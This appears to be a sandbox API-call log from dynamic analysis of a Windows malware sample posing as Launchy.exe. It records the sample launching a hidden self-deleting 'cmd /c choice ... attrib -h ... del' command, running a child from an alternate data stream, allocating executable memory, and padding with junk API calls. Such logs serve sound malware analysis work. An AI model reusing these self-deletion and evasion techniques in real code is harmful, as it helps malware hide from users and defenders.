[0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fbdc8 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc200 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc2a0 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc138 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc340 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71ab10 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71ab38 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a598 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a4d0 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a7f0 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a5e8 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71a700 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x708aa0 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x708a70 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x708bf0 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x708c50 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71b220 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71b010 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71acb0 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71add0 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71af20 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x708b60 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x708b90 | out: hHeap=0x6f0000) returned 1 [0244.725] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71ae00 | out: hHeap=0x6f0000) returned 1 [0244.726] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71ad40 | out: hHeap=0x6f0000) returned 1 [0244.726] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x708b30 | out: hHeap=0x6f0000) returned 1 [0244.726] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x708c20 | out: hHeap=0x6f0000) returned 1 [0244.726] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x708bc0 | out: hHeap=0x6f0000) returned 1 [0244.726] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71b280 | out: hHeap=0x6f0000) returned 1 [0244.726] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x70a018 | out: hHeap=0x6f0000) returned 1 [0244.726] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop\\Launchy.exe") returned 35 [0244.726] lstrcmpW (lpString1=".exe", lpString2=":bin") returned -1 [0244.726] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xf6) returned 0x70ded8 [0244.726] _snwprintf (in: _Dest=0x70ded8, _Count=0x7b, _Format="cmd /c choice /t %u /d y & attrib -h \"%s\" & del \"%s\"" | out: _Dest="cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\FD1HVy\\Desktop\\Launchy.exe\" & del \"C:\\Users\\FD1HVy\\Desktop\\Launchy.exe\"") returned 118 [0244.727] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\FD1HVy\\Desktop\\Launchy.exe\" & del \"C:\\Users\\FD1HVy\\Desktop\\Launchy.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fef0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19ff34 | out: lpCommandLine="cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\FD1HVy\\Desktop\\Launchy.exe\" & del \"C:\\Users\\FD1HVy\\Desktop\\Launchy.exe\"", lpProcessInformation=0x19ff34*(hProcess=0x260, hThread=0x268, dwProcessId=0x1064, dwThreadId=0x13e0)) returned 1 [0244.848] CloseHandle (hObject=0x268) returned 1 [0244.848] CloseHandle (hObject=0x260) returned 1 [0244.848] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x70ded8 | out: hHeap=0x6f0000) returned 1 [0244.849] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x0) returned 0x401af6 [0244.992] WaitForSingleObject (hHandle=0x254, dwMilliseconds=0x0) returned 0x102 [0244.992] CloseHandle (hObject=0x25c) returned 1 [0244.992] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Launchy.dmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\launchy.dmp")) returned 1 [0244.993] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0x107c Process: id = "2" image_name = "still:bin" filename = "c:\\users\\fd1hvy\\appdata\\roaming\\still:bin" page_root = "0x1dc94000" os_pid = "0x704" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x11c4" cmd_line = "C:\\Users\\FD1HVy\\AppData\\Roaming\\Still:bin -r" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0x127c [0110.115] LoadCursorW (hInstance=0x0, lpCursorName=0x257f) returned 0x0 [0110.382] GetUserNameA (in: lpBuffer=0x19ff10, pcbBuffer=0x19ff7c | out: lpBuffer="FD1HVy", pcbBuffer=0x19ff7c) returned 1 [0110.527] GetEnhMetaFileW (lpName="7589678967896789") returned 0x0 [0110.528] GetLastError () returned 0x2 [0110.528] LoadLibraryA (lpLibFileName="advapi32") returned 0x756e0000 [0110.528] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryValueExA") returned 0x756ff020 [0110.528] RegOpenKeyA (in: hKey=0x80000000, lpSubKey="InterfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}", phkResult=0x50d690 | out: phkResult=0x50d690*=0x246) returned 0x0 [0110.529] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0110.529] RegQueryValueExA (in: hKey=0x246, lpValueName="", lpReserved=0x0, lpType=0x19feb4, lpData=0x19fde8, lpcbData=0x50d368*=0xc8 | out: lpType=0x19feb4*=0x1, lpData="IEnumConnections", lpcbData=0x50d368*=0x11) returned 0x0 [0110.529] LoadLibraryA (lpLibFileName="kernel32") returned 0x772d0000 [0110.530] GetProcAddress (hModule=0x772d0000, lpProcName="VirtualAlloc") returned 0x772e6970 [0110.530] VirtualAlloc (lpAddress=0x0, dwSize=0xf200, flAllocationType=0x3000, flProtect=0x40) returned 0x1d0000 [0110.530] LoadIconA (hInstance=0x0, lpIconName=0x24a7) returned 0x0 [0110.531] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.531] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.531] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.531] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.531] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.531] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.531] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.531] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.531] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.532] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.532] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.532] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.532] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.532] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.532] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.532] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.532] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.532] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.532] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.532] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.533] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.533] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.533] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.533] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.533] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.533] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.533] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.533] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.533] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.533] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.533] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.533] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.534] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.534] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.534] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.534] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.534] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.534] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.534] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.534] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.534] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.534] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.534] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.535] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.535] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.535] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.535] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.535] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.535] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.535] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.535] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.535] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.535] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.535] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.535] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.536] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.536] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.536] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.536] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.536] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.536] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.536] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.536] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.536] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.536] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.537] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.537] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.537] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.537] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.537] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.537] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.537] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.537] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.537] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.537] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.537] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.538] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.538] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.538] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.538] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.538] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.538] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.538] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.538] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.538] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.538] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.538] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.539] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.539] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.539] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.539] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.539] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.588] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.588] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.588] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.588] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.588] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.588] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.588] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.588] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.588] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.589] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.589] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.589] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.589] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.589] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.589] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.589] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.589] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.589] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.589] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.589] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.590] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.590] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.590] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.590] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.590] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.590] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.590] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.590] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.590] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.590] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.591] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.591] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.591] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.591] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.591] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.591] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.591] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.591] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.591] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.591] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.591] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.592] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.592] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.592] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.592] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.592] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.592] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.592] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.592] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.592] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.592] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.593] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.593] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.593] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.593] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.593] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.593] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.593] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.593] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.593] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.593] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.593] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.594] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.594] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.594] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.594] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.594] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.594] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.594] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.594] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.594] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.594] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.594] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.595] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.595] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.595] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.595] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.595] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.595] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.595] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.595] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.595] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.595] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.595] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.596] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.596] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.596] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.596] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.596] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0110.596] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.596] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.596] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.596] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.596] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.596] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.597] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.597] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.597] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.597] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.597] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.597] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.597] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.597] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.597] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.597] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.597] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.597] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.598] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.598] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.598] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.598] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.598] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.598] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.598] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.598] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.598] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.598] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.599] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.600] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.601] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.602] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.602] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.602] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.602] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.602] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0110.602] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0114.438] GetKeyState (nVirtKey=1) returned 0 [0114.438] GetStretchBltMode (hdc=0x1) returned 0 [0114.438] GetStockObject (i=789644) returned 0x0 [0114.438] GetStockObject (i=789644) returned 0x0 [0114.438] GetStockObject (i=789644) returned 0x0 [0114.438] GetStockObject (i=789644) returned 0x0 [0114.438] GetStockObject (i=789644) returned 0x0 [0114.438] GetStockObject (i=789644) returned 0x0 [0114.438] GetStockObject (i=789644) returned 0x0 [0114.438] GetStockObject (i=789644) returned 0x0 [0114.438] GetStockObject (i=789644) returned 0x0 [0114.438] GetStockObject (i=789644) returned 0x0 [0114.438] GetStockObject (i=789644) returned 0x0 [0114.438] GetStockObject (i=789644) returned 0x0 [0114.438] GetStockObject (i=789644) returned 0x0 